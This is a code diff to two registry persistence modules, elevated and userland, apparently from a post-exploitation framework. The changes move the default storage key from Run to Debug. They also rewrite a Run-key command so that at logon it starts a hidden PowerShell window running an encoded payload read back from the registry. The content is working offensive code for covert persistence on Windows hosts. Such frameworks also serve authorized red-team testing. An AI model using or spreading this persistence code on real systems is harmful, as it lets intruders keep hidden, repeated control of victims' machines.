diff --git a/lib/modules/persistence/elevated/registry.py b/lib/modules/persistence/elevated/registry.py
index 2cb257c..c83582e 100644
--- a/lib/modules/persistence/elevated/registry.py
+++ b/lib/modules/persistence/elevated/registry.py
@@ -50,7 +50,7 @@ class Module:
             'RegPath' : {
                 'Description'   :   'Registry location to store the script code. Last element is the key name.',
                 'Required'      :   False,
-                'Value'         :   'HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
+                'Value'         :   'HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug'
             },
             'ADSPath' : {
                 'Description'   :   'Alternate-data-stream location to store the script code.',
@@ -199,8 +199,8 @@ class Module:
             locationString = "$((gp "+path+" "+name+")."+name+")"
 
 
-        script += "$null=Set-ItemProperty -Force -Path HKLM:Software\\Microsoft\Windows\\CurrentVersion\\Run\\ -Name "+keyName+" -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"start -Win Hidden -A \"-enc "+locationString+"\" powershell\"';"
+        script += "$null=Set-ItemProperty -Force -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+" -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x="+locationString+";powershell -Win Hidden -enc $x\"';"
 
         script += "'Registry persistence established "+statusMsg+"'"
 
-        return script
\ No newline at end of file
+        return script
diff --git a/lib/modules/persistence/userland/registry.py b/lib/modules/persistence/userland/registry.py
index c4e214e..58bac3e 100644
--- a/lib/modules/persistence/userland/registry.py
+++ b/lib/modules/persistence/userland/registry.py
@@ -50,7 +50,7 @@ class Module:
             'RegPath' : {
                 'Description'   :   'Registry location to store the script code. Last element is the key name.',
                 'Required'      :   False,
-                'Value'         :   'HKCU:Software\Microsoft\Windows\CurrentVersion\Run'
+                'Value'         :   'HKCU:Software\Microsoft\Windows\CurrentVersion\Debug'
             },
             'ADSPath' : {
                 'Description'   :   'Alternate-data-stream location to store the script code.',
@@ -229,7 +229,7 @@ class Module:
 
         # set the run key to extract the encoded script from the specified location
         #   and start powershell.exe in the background with the encoded command
-        script += "$null=Set-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+" -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x="+locationString+";start -Win Hidden -A \"-enc $x\" powershell\"';"
+        script += "$null=Set-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+" -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x="+locationString+";powershell -Win Hidden -enc $x\"';"
 
         script += "'Registry persistence established "+statusMsg+"'"